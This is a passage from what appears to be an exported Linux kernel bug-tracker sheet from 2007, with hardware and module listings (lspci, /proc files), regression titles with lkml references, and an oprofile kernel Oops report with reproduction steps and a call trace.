(prog-if 85 [Master SecO PriO]) Subsystem: ASUSTeK Computer Inc. Unknown device 81bc Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 (750ns min, 250ns max) Interrupt: pin A routed to IRQ 7 Region 0: I/O ports at c800 [size=8] Region 1: I/O ports at c480 [size=4] Region 2: I/O ports at c400 [size=8] Region 3: I/O ports at c080 [size=4] Region 4: I/O ports at c000 [size=16] Region 5: Memory at dfddd000 (32-bit, non-prefetchable) [size=4K] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [b0] Message Signalled Interrupts: Mask- 64bit+ Queue=0/2 Enable- Address: 0000000000000000 Data: 0000 Capabilities: [cc] HyperTransport: MSI Mapping 00:0f.0 IDE interface: nVidia Corporation MCP51 Serial ATA Controller (rev a1) (prog-if 85 [Master SecO PriO]) Subsystem: ASUSTeK Computer Inc. Unknown device 81bc Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 (750ns min, 250ns max) Interrupt: pin A routed to IRQ 11 Region 0: I/O ports at bc00 [size=8] Region 1: I/O ports at b880 [size=4] Region 2: I/O ports at b800 [size=8] Region 3: I/O ports at b480 [size=4] Region 4: I/O ports at b400 [size=16] Region 5: Memory at dfddc000 (32-bit, non-prefetchable) [size=4K] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [b0] Message Signalled Interrupts: Mask- 64bit+ Queue=0/2 Enable- Address: 0000000000000000 Data: 0000 Capabilities: [cc] HyperTransport: MSI Mapping 00:10.0 PCI bridge: nVidia Corporation MCP51 PCI Bridge (rev a2) (prog-if 01 [Subtractive decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Bus: primary=00, secondary=04, subordinate=04, sec-latency=64 I/O behind bridge: 0000e000-0000efff Memory behind bridge: dff00000-dfffffff Prefetchable memory behind bridge: fff00000-000fffff Secondary status: 66MHz- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR+ BridgeCtl: Parity- SERR+ NoISA- VGA- MAbort- &gt;Reset- FastB2B- Capabilities: [b8] Subsystem: Gammagraphx, Inc. Unknown device 0000 Capabilities: [8c] HyperTransport: MSI Mapping 00:10.1 Audio device: nVidia Corporation MCP51 High Definition Audio (rev a2) Subsystem: ASUSTeK Computer Inc. Unknown device 821f Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 (500ns min, 1250ns max) Interrupt: pin B routed to IRQ 10 Region 0: Memory at dfdd4000 (32-bit, non-prefetchable) [size=16K] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [50] Message Signalled Interrupts: Mask+ 64bit+ Queue=0/0 Enable- Address: 0000000000000000 Data: 0000 Masking: 00000000 Pending: 00000000 Capabilities: [6c] HyperTransport: MSI Mapping 00:14.0 Bridge: nVidia Corporation MCP51 Ethernet Controller (rev a3) Subsystem: ASUSTeK Computer Inc. Unknown device 81bc Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 (250ns min, 5000ns max) Interrupt: pin A routed to IRQ 15 Region 0: Memory at dfdd3000 (32-bit, non-prefetchable) [size=4K] Region 1: I/O ports at b080 [size=8] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:18.0 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] HyperTransport Technology Configuration Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Capabilities: [80] HyperTransport: Host or Secondary Interface !!! Possibly incomplete decoding Command: WarmRst+ DblEnd- Link Control: CFlE- CST- CFE- &lt;LkFail- Init+ EOC- TXO- &lt;CRCErr=0 Link Config: MLWI=16bit MLWO=16bit LWI=16bit LWO=16bit Revision ID: 1.02 00:18.1 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Address Map Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- 00:18.2 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] DRAM Controller Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- 00:18.3 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Miscellaneous Control Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Capabilities: [f0] #0f [0010] 01:00.0 SATA controller: JMicron Technologies, Inc. JMicron 20360/20363 AHCI Controller (rev 02) (prog-if 01 [AHCI 1.0]) Subsystem: ASUSTeK Computer Inc. Unknown device 81e4 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 5 Region 5: Memory at dfefe000 (32-bit, non-prefetchable) [size=8K] Expansion ROM at dfee0000 [disabled] [size=64K] Capabilities: [68] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot+,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [50] Express Legacy Endpoint IRQ 1 Device: Supported: MaxPayload 128 bytes, PhantFunc 0, ExtTag- Device: Latency L0s &lt;64ns, L1 &lt;1us Device: AtnBtn- AtnInd- PwrInd- Device: Errors: Correctable- Non-Fatal- Fatal- Unsupported- Device: RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- Device: MaxPayload 128 bytes, MaxReadReq 512 bytes Link: Supported Speed 2.5Gb/s, Width x1, ASPM L0s, Port 1 Link: Latency L0s &lt;1us, L1 &lt;16us Link: ASPM Disabled RCB 64 bytes CommClk+ ExtSynch- Link: Speed 2.5Gb/s, Width x1 01:00.1 IDE interface: JMicron Technologies, Inc. JMicron 20360/20363 AHCI Controller (rev 02) (prog-if 85 [Master SecO PriO]) Subsystem: ASUSTeK Computer Inc. Unknown device 81e4 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin B routed to IRQ 10 Region 0: I/O ports at dc00 [size=8] Region 1: I/O ports at d880 [size=4] Region 2: I/O ports at d800 [size=8] Region 3: I/O ports at d480 [size=4] Region 4: I/O ports at d400 [size=16] Capabilities: [68] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 04:05.0 FireWire (IEEE 1394): VIA Technologies, Inc. IEEE 1394 Host Controller (rev c0) (prog-if 10 [OHCI]) Subsystem: ASUSTeK Computer Inc. Unknown device 2a22 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 (8000ns max), Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 11 Region 0: Memory at dffff800 (32-bit, non-prefetchable) [size=2K] Region 1: I/O ports at ec00 [size=128] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2+ AuxCurrent=0mA PME(D0-,D1-,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- $ cat /proc/cpuinfo processor : 0 vendor_id : AuthenticAMD cpu family : 15 model : 107 model name : AMD Athlon(tm) 64 X2 Dual Core Processor 4400+ stepping : 1 cpu MHz : 2210.076 cache size : 512 KB physical id : 0 siblings : 2 core id : 0 cpu cores : 2 fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt rdtscp lm 3dnowext 3dnow rep_good pni cx16 lahf_lm cmp_legacy svm extapic cr8_legacy misalignsse bogomips : 4424.05 TLB size : 1024 4K pages clflush size : 64 cache_alignment : 64 address sizes : 40 bits physical, 48 bits virtual power management: ts fid vid ttp tm stc 100mhzsteps processor : 1 vendor_id : AuthenticAMD cpu family : 15 model : 107 model name : AMD Athlon(tm) 64 X2 Dual Core Processor 4400+ stepping : 1 cpu MHz : 2210.076 cache size : 512 KB physical id : 0 siblings : 2 core id : 1 cpu cores : 2 fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt rdtscp lm 3dnowext 3dnow rep_good pni cx16 lahf_lm cmp_legacy svm extapic cr8_legacy misalignsse bogomips : 4420.51 TLB size : 1024 4K pages clflush size : 64 cache_alignment : 64 address sizes : 40 bits physical, 48 bits virtual power management: ts fid vid ttp tm stc 100mhzsteps $ cat /proc/ioports 0000-001f : dma1 0020-0021 : pic1 0040-0043 : timer0 0050-0053 : timer1 0060-006f : keyboard 0070-0077 : rtc 0080-008f : dma page reg 00a0-00a1 : pic2 00c0-00df : dma2 00f0-00ff : fpu 0170-0177 : 0000:00:0d.0 01f0-01f7 : 0000:00:0d.0 0376-0376 : 0000:00:0d.0 03c0-03df : vesafb 03f6-03f6 : 0000:00:0d.0 03f8-03ff : serial 0500-0503 : ACPI PM1a_EVT_BLK 0504-0505 : ACPI PM1a_CNT_BLK 0508-050b : ACPI PM_TMR 0520-0527 : ACPI GPE0_BLK 0600-063f : 0000:00:0a.1 0600-063f : nForce2_smbus 0700-073f : 0000:00:0a.1 0700-073f : nForce2_smbus 08a0-08af : ACPI GPE1_BLK 0a00-0a0f : pnp 00:0b 0a10-0a1f : pnp 00:0b 0a10-0a17 : it87 0a10-0a17 : it87 0a20-0a2f : pnp 00:0b 0a30-0a3f : pnp 00:0b 0cf8-0cff : PCI conf1 b080-b087 : 0000:00:14.0 b080-b087 : forcedeth b400-b40f : 0000:00:0f.0 b400-b40f : libata b480-b483 : 0000:00:0f.0 b480-b483 : libata b800-b807 : 0000:00:0f.0 b800-b807 : libata b880-b883 : 0000:00:0f.0 b880-b883 : libata bc00-bc07 : 0000:00:0f.0 bc00-bc07 : libata c000-c00f : 0000:00:0e.0 c000-c00f : libata c080-c083 : 0000:00:0e.0 c080-c083 : libata c400-c407 : 0000:00:0e.0 c400-c407 : libata c480-c483 : 0000:00:0e.0 c480-c483 : libata c800-c807 : 0000:00:0e.0 c800-c807 : libata d000-dfff : PCI Bus #01 d400-d40f : 0000:01:00.1 d400-d407 : ide0 d408-d40f : ide1 d480-d483 : 0000:01:00.1 d800-d807 : 0000:01:00.1 d880-d883 : 0000:01:00.1 dc00-dc07 : 0000:01:00.1 e000-efff : PCI Bus #04 ec00-ec7f : 0000:04:05.0 ffa0-ffaf : 0000:00:0d.0 ffa0-ffa7 : ide2 $ cat /proc/iomem 00000000-0009fbff : System RAM 00000000-00000000 : Crash kernel 0009fc00-0009ffff : reserved 000c0000-000cffff : pnp 00:0d 000e0000-000fffff : reserved 00100000-77fbffff : System RAM 00200000-00403abb : Kernel code 00403abc-004f7d3f : Kernel data 77fc0000-77fcdfff : ACPI Tables 77fce000-77feffff : ACPI Non-volatile Storage 77ff0000-77ffffff : reserved 78000000-7fffffff : pnp 00:06 c0000000-cfffffff : 0000:00:05.0 c0000000-c7ffffff : vesafb dd000000-ddffffff : 0000:00:05.0 de000000-deffffff : 0000:00:05.0 dfd80000-dfdbffff : pnp 00:06 dfdd3000-dfdd3fff : 0000:00:14.0 dfdd3000-dfdd3fff : forcedeth dfdd4000-dfdd7fff : 0000:00:10.1 dfdd4000-dfdd7fff : ICH HD audio dfddc000-dfddcfff : 0000:00:0f.0 dfddc000-dfddcfff : sata_nv dfddd000-dfdddfff : 0000:00:0e.0 dfddd000-dfdddfff : sata_nv dfdde000-dfddefff : 0000:00:0b.0 dfdde000-dfddefff : ohci_hcd dfddfc00-dfddfcff : 0000:00:0b.1 dfddfc00-dfddfcff : ehci_hcd dfde0000-dfdfffff : 0000:00:05.0 dfe00000-dfefffff : PCI Bus #01 dfee0000-dfeeffff : 0000:01:00.0 dfefe000-dfefffff : 0000:01:00.0 dfefe000-dfefffff : ahci dff00000-dfffffff : PCI Bus #04 dffff800-dfffffff : 0000:04:05.0 dffff800-dfffffff : firewire_ohci e0000000-efffffff : pnp 00:0c fec00000-fec00fff : IOAPIC 0 fec00000-fec00fff : reserved fee00000-fee00fff : Local APIC fee01000-feefffff : pnp 00:06 fefe0000-fefe01ff : pnp 00:05 ff780000-ffffffff : reserved $ cat /proc/scsi/scsi Attached devices: Host: scsi2 Channel: 00 Id: 00 Lun: 00 Vendor: ATA Model: ST3320620AS Rev: 3.AA Type: Direct-Access ANSI SCSI revision: 05 Host: scsi3 Channel: 00 Id: 00 Lun: 00 Vendor: ASUS Model: DRW-1814BLT Rev: 1.04 Type: CD-ROM ANSI SCSI revision: 05 Host: scsi4 Channel: 00 Id: 00 Lun: 00 Vendor: ATA Model: ST3160812AS Rev: 3.AA Type: Direct-Access ANSI SCSI revision: 05 Software Environment: $ cat /proc/modules xt_multiport 7680 1 - Live 0xffffffff88350000 binfmt_misc 17292 1 - Live 0xffffffff8834a000 ipt_ULOG 15624 1 - Live 0xffffffff88345000 ac 10760 0 - Live 0xffffffff88341000 battery 18064 0 - Live 0xffffffff8833b000 ipv6 303208 26 - Live 0xffffffff882ef000 cpufreq_stats 10400 0 - Live 0xffffffff882eb000 cpufreq_conservative 12424 0 - Live 0xffffffff882e6000 cpufreq_ondemand 13456 0 - Live 0xffffffff882e1000 cpufreq_powersave 6272 0 - Live 0xffffffff882de000 cpufreq_userspace 9604 0 - Live 0xffffffff882da000 freq_table 9728 2 cpufreq_stats,cpufreq_ondemand, Live 0xffffffff882d6000 ipt_REJECT 9344 1 - Live 0xffffffff882d2000 xt_tcpudp 7936 7 - Live 0xffffffff882cf000 xt_state 7040 1 - Live 0xffffffff882cc000 iptable_nat 12036 0 - Live 0xffffffff882c8000 nf_nat 26028 1 iptable_nat, Live 0xffffffff882c0000 nf_conntrack_ipv4 24336 3 iptable_nat, Live 0xffffffff882b9000 nf_conntrack 77696 4 xt_state,iptable_nat,nf_nat,nf_conntrack_ipv4, Live 0xffffffff882a5000 nfnetlink 10952 3 nf_nat,nf_conntrack_ipv4,nf_conntrack, Live 0xffffffff882a1000 iptable_filter 7680 1 - Live 0xffffffff8829e000 ip_tables 25960 2 iptable_nat,iptable_filter, Live 0xffffffff88296000 x_tables 24712 7 xt_multiport,ipt_ULOG,ipt_REJECT,xt_tcpudp,xt_state,iptable_nat,ip_tables, Live 0xffffffff8828e000 fuse 50480 1 - Live 0xffffffff88280000 it87 27664 0 - Live 0xffffffff88278000 hwmon_vid 7296 1 it87, Live 0xffffffff88275000 firewire_sbp2 20624 0 - Live 0xffffffff8826e000 loop 23428 0 - Live 0xffffffff88267000 snd_hda_intel 339364 0 - Live 0xffffffff88213000 snd_pcm_oss 48288 0 - Live 0xffffffff88206000 snd_mixer_oss 21376 1 snd_pcm_oss, Live 0xffffffff881ff000 snd_pcm 89864 2 snd_hda_intel,snd_pcm_oss, Live 0xffffffff881e8000 snd_timer 28552 1 snd_pcm, Live 0xffffffff881e0000 snd 65640 5 snd_hda_intel,snd_pcm_oss,snd_mixer_oss,snd_pcm,snd_timer, Live 0xffffffff881ce000 k8temp 10496 0 - Live 0xffffffff881ca000 serio_raw 11908 0 - Live 0xffffffff881c6000 button 13856 0 - Live 0xffffffff881c1000 psmouse 45596 0 - Live 0xffffffff881b4000 soundcore 13216 1 snd, Live 0xffffffff881af000 snd_page_alloc 14608 2 snd_hda_intel,snd_pcm, Live 0xffffffff881aa000 i2c_nforce2 11008 0 - Live 0xffffffff881a6000 i2c_core 30976 1 i2c_nforce2, Live 0xffffffff8819d000 pcspkr 7808 0 - Live 0xffffffff8819a000 evdev 15360 0 - Live 0xffffffff88195000 joydev 15744 0 - Live 0xffffffff88190000 tsdev 13440 0 - Live 0xffffffff8818b000 ext3 137232 7 - Live 0xffffffff88168000 jbd 68080 1 ext3, Live 0xffffffff88156000 mbcache 13952 1 ext3, Live 0xffffffff88151000 dm_mirror 27008 0 - Live 0xffffffff88149000 dm_snapshot 21960 0 - Live 0xffffffff88142000 dm_mod 64368 15 dm_mirror,dm_snapshot, Live 0xffffffff88131000 sg 40872 0 - Live 0xffffffff88126000 sr_mod 22436 0 - Live 0xffffffff8811f000 cdrom 39592 1 sr_mod, Live 0xffffffff88114000 sd_mod 33408 7 - Live 0xffffffff8810a000 amd74xx 19120 0 [permanent], Live 0xffffffff88104000 usbhid 34144 0 - Live 0xffffffff880fa000 hid 33152 1 usbhid, Live 0xffffffff880f0000 firewire_ohci 22912 0 - Live 0xffffffff880e7000 jmicron 8576 0 [permanent], Live 0xffffffff880e1000 generic 10372 0 [permanent], Live 0xffffffff880db000 sata_nv 25988 7 - Live 0xffffffff880d1000 ehci_hcd 38156 0 - Live 0xffffffff880c6000 firewire_core 49600 2 firewire_sbp2,firewire_ohci, Live 0xffffffff880b8000 crc_itu_t 6656 1 firewire_core, Live 0xfffff</t>
  </si>
  <si>
    <t>sysfs change of input/event devices in 2.6.23rc breaks udev</t>
  </si>
  <si>
    <t>2007-09-26 13:09 UTC</t>
  </si>
  <si>
    <t>2007-09-26 13:24 UTC</t>
  </si>
  <si>
    <t>References : http://lkml.org/lkml/2007/9/8/86 Last known good : 2.6.22 Submitter : Anssi Hannula &lt;anssi.hannula@gmail.com&gt; Handled-By : Dmitry Torokhov &lt;dmitry.torokhov@gmail.com&gt;</t>
  </si>
  <si>
    <t>umount triggers a warning in jfs and takes almost a minute</t>
  </si>
  <si>
    <t>2007-09-26 14:08 UTC</t>
  </si>
  <si>
    <t>2008-09-23 03:05 UTC</t>
  </si>
  <si>
    <t>References : http://lkml.org/lkml/2007/9/4/73 Submitter : Oliver Neukum &lt;oliver@neukum.org&gt;</t>
  </si>
  <si>
    <t>build #301 failed for 2.6.23-rc6-g0d4cbb5 in linux/drivers/net/wireless/libertas/</t>
  </si>
  <si>
    <t>2007-09-26 14:13 UTC</t>
  </si>
  <si>
    <t>2007-10-04 15:25 UTC</t>
  </si>
  <si>
    <t>References : http://lkml.org/lkml/2007/9/11/150 Submitter : Toralf Förster &lt;toralf.foerster@gmx.de&gt;</t>
  </si>
  <si>
    <t>2.6.23-rc5: possible irq lock inversion dependency detected</t>
  </si>
  <si>
    <t>2007-09-26 14:18 UTC</t>
  </si>
  <si>
    <t>2007-09-26 14:21 UTC</t>
  </si>
  <si>
    <t>References : http://lkml.org/lkml/2007/9/2/97 Submitter : Christian Kujau &lt;lists@nerdbynature.de&gt; Handled-By : jamal &lt;hadi@cyberus.ca&gt;</t>
  </si>
  <si>
    <t>resume from ram much slower</t>
  </si>
  <si>
    <t>above 2.6.23-rc1</t>
  </si>
  <si>
    <t>2007-09-26 14:52 UTC</t>
  </si>
  <si>
    <t>2007-09-26 15:17 UTC</t>
  </si>
  <si>
    <t>References : http://lkml.org/lkml/2007/8/10/275 Last known good : 2.6.23-rc1 ? Submitter : Arkadiusz Miskiewicz &lt;arekm@maven.pl&gt;</t>
  </si>
  <si>
    <t>Regression in 2.6.23-pre Was: Problems with 2.6.23-rc6 on AMD Geode LX800</t>
  </si>
  <si>
    <t>after 2.6.22</t>
  </si>
  <si>
    <t>2007-09-26 15:52 UTC</t>
  </si>
  <si>
    <t>2007-09-29 05:36 UTC</t>
  </si>
  <si>
    <t>References : http://lkml.org/lkml/2007/9/26/91 Submitter : Joerg Pommnitz &lt;pommnitz@yahoo.com&gt; Caused-By : H. Peter Anvin &lt;hpa@zytor.com&gt; commit 4fd06960f120e02e9abc802a09f9511c400042a5 Use the new x86 setup code for i386 Handled-By : H. Peter Anvin &lt;hpa@zytor.com&gt;</t>
  </si>
  <si>
    <t>make rpm in error</t>
  </si>
  <si>
    <t>2.6.22.9</t>
  </si>
  <si>
    <t>2007-09-28 11:26 UTC</t>
  </si>
  <si>
    <t>Mickael</t>
  </si>
  <si>
    <t>2007-09-28 19:10 UTC</t>
  </si>
  <si>
    <t>oprofile Oops in wq_sync_buffer/get_task_mm</t>
  </si>
  <si>
    <t>2007-09-30 04:27 UTC</t>
  </si>
  <si>
    <t>safari-ml-linux-bugzilla</t>
  </si>
  <si>
    <t>2007-11-20 00:31 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: NA Distribution: Redhat Fedora Hardware Environment: Pentium D 2.8 GHz, Intel DQ965GF mobo Software Environment: x86_64 Linux 2.6.22.9 SMP, gcc version 4.1.2 20070925 (Red Hat 4.1.2-28) Problem Description: when using oprofile with more than one events, "ping -f 127.0.0.1" triggers the Oops in under 0.1s. Also some other things trigger this less reliably. Steps to reproduce: --- ~root/.oprofile/daemonrc SESSION_DIR=/dev/shm/oprofile CHOSEN_EVENTS_0=GLOBAL_POWER_EVENTS:240000:0x01:1:1 CHOSEN_EVENTS_1=MACHINE_CLEAR:12000:0x01:1:1 CHOSEN_EVENTS_2=FSB_DATA_ACTIVITY:30000:0x03:1:1 CHOSEN_EVENTS_3=RETIRED_BRANCH_TYPE:180000:0x1f:1:1 CHOSEN_EVENTS_4=RETIRED_MISPRED_BRANCH_TYPE:18000:0x1f:1:1 NR_CHOSEN=5 SEPARATE_LIB=0 SEPARATE_KERNEL=0 SEPARATE_THREAD=0 SEPARATE_CPU=0 VMLINUX=/wrk/safari/linux-2.6.22-x86_64/vmlinux-2.6.22.9-041-cfs-v22 IMAGE_FILTER= CPU_BUF_SIZE=0 CALLGRAPH=0 KERNEL_RANGE=ffffffff80200000,ffffffff808bd678 XENIMAGE=none opcontrol --start ping -f 127.0.0.1 If you can't reproduce, make sample counts smaller. 2007-09-30 13:59:54.094833752 &lt;1&gt;[65733.031448] Unable to handle kernel NULL pointer dereference at 0000000000000640 RIP: 2007-09-30 13:59:54.094903454 &lt;1&gt;[65733.031456] [&lt;ffffffff8063a6e4&gt;] _spin_lock+0x4/0x20 2007-09-30 13:59:54.094905759 &lt;4&gt;[65733.031467] PGD 27bcd067 PUD 0 2007-09-30 13:59:54.094907296 &lt;0&gt;[65733.031481] Oops: 0002 [1] SMP 2007-09-30 13:59:54.094908832 &lt;4&gt;[65733.031485] CPU 0 2007-09-30 13:59:54.094934814 &lt;4&gt;[65733.031487] Modules linked in: nls_utf8 i915 oprofile xt_CLASSIFY ipt_ECN xt_CONNMARK xt_connlimit xt_length ipt_set xt_multiport ip_set_iphash ip_set_nethash ip_set_portmap sch_esfq ipt_REJECT ip6t_LOG xt_limit ipt_LOG xt_hashlimit ipt_owner nf_conntrack_ipv4 xt_state xt_tcpudp ip6table_filter ip6table_mangle ip6_tables iptable_filter iptable_mangle iptable_raw ip_tables tcp_highspeed tcp_htcp tcp_hybla tcp_scalable tcp_vegas tcp_westwood ip_set sch_netem sch_hfsc sch_htb sch_sfq cls_fw cls_u32 cls_route sch_ingress sch_red sch_tbf sch_teql sch_prio sch_gred cls_rsvp cls_rsvp6 cls_tcindex sch_cbq sch_dsmark nf_conntrack xt_TARPIT x_tables perfctr dccp_diag dccp ioatdma cmtp kernelcapi l2cap bluetooth intelfb i2c_algo_bit i810 lp i2c_dev ftdi_sio usbserial usb_storage eeprom ohci_hcd irlan irda crc_ccitt binfmt_misc loop dm_mod video dock button battery ac tcp_cubic nvram snd_hda_intel snd_seq_dummy snd_seq_oss snd_seq_midi_event snd_seq ohci1394 snd_seq_device snd_pcm_oss snd_m 2007-09-30 13:59:54.106675814 ixer_oss ieee1394 i2c_i801 i2c_core iTCO_wdt iTCO_vendor_support snd_pcm parport_pc e1000 snd_timer snd soundcore ehci_hcd parport snd_page_alloc uhci_hcd 2007-09-30 13:59:54.106679865 &lt;4&gt;[65733.031598] Pid: 7, comm: events/0 Not tainted 2.6.22.9-cfs-v22 #14 2007-09-30 13:59:54.106681680 &lt;4&gt;[65733.031601] RIP: 0010:[&lt;ffffffff8063a6e4&gt;] [&lt;ffffffff8063a6e4&gt;] _spin_lock+0x4/0x20 2007-09-30 13:59:54.106683566 &lt;4&gt;[65733.031608] RSP: 0018:ffff81003e5fddc0 EFLAGS: 00010282 2007-09-30 13:59:54.106685242 &lt;4&gt;[65733.031611] RAX: 0000000000000000 RBX: 0000000000000004 RCX: 0000000000018000 2007-09-30 13:59:54.106691598 &lt;4&gt;[65733.031614] RDX: ffff81003e5fdfd8 RSI: 0000000000000183 RDI: 0000000000000640 2007-09-30 13:59:54.106693554 &lt;4&gt;[65733.031618] RBP: ffff81003e5fddc0 R08: 2222222222222222 R09: 2222222222222222 2007-09-30 13:59:54.106695509 &lt;4&gt;[65733.031621] R10: 2222222222222222 R11: 2222222222222222 R12: 0000000000000004 2007-09-30 13:59:54.106697255 &lt;4&gt;[65733.031625] R13: ffffffffffffffff R14: ffffffff8831db00 R15: 000000000000000c 2007-09-30 13:59:54.106702494 &lt;4&gt;[65733.031629] FS: 0000000000000000(0000) GS:ffffffff807e3000(0000) knlGS:0000000000000000 2007-09-30 13:59:54.106704519 &lt;4&gt;[65733.031632] CS: 0010 DS: 0018 ES: 0018 CR0: 000000008005003b 2007-09-30 13:59:54.106706195 &lt;4&gt;[65733.031635] CR2: 0000000000000640 CR3: 000000000a998000 CR4: 00000000000006e0 2007-09-30 13:59:54.106715834 &lt;4&gt;[65733.031639] Process events/0 (pid: 7, threadinfo ffff81003e5fc000, task ffff810001ffa100) 2007-09-30 13:59:54.106717929 &lt;4&gt;[65733.031642] Stack: ffff81003e5fdde0 ffffffff80231f88 ffff81003e5fddf0 0000000000008be1 2007-09-30 13:59:54.106719745 &lt;4&gt;[65733.031650] ffff81003e5fde60 ffffffff88316b64 ffff810001dba900 0000000000000000 2007-09-30 13:59:54.106721631 &lt;4&gt;[65733.031661] ffff81003d914700 ffff810036166a40 0000000100000001 0000000000000023 2007-09-30 13:59:54.106750266 &lt;4&gt;[65733.031666] Call Trace: 2007-09-30 13:59:54.106752012 &lt;4&gt;[65733.031677] [&lt;ffffffff80231f88&gt;] get_task_mm+0x18/0x50 2007-09-30 13:59:54.106757669 &lt;4&gt;[65733.031701] [&lt;ffffffff88316b64&gt;] :oprofile:sync_buffer+0xf4/0x450 2007-09-30 13:59:54.106759416 &lt;4&gt;[65733.031737] [&lt;ffffffff88316650&gt;] :oprofile:wq_sync_buffer+0x0/0x60 2007-09-30 13:59:54.106761162 &lt;4&gt;[65733.031757] [&lt;ffffffff88316650&gt;] :oprofile:wq_sync_buffer+0x0/0x60 2007-09-30 13:59:54.106767657 &lt;4&gt;[65733.031781] [&lt;ffffffff88316683&gt;] :oprofile:wq_sync_buffer+0x33/0x60 2007-09-30 13:59:54.106769403 &lt;4&gt;[65733.031799] [&lt;ffffffff80243879&gt;] run_workqueue+0x89/0x120 2007-09-30 13:59:54.106771149 &lt;4&gt;[65733.031823] [&lt;ffffffff80244307&gt;] worker_thread+0xc7/0x130 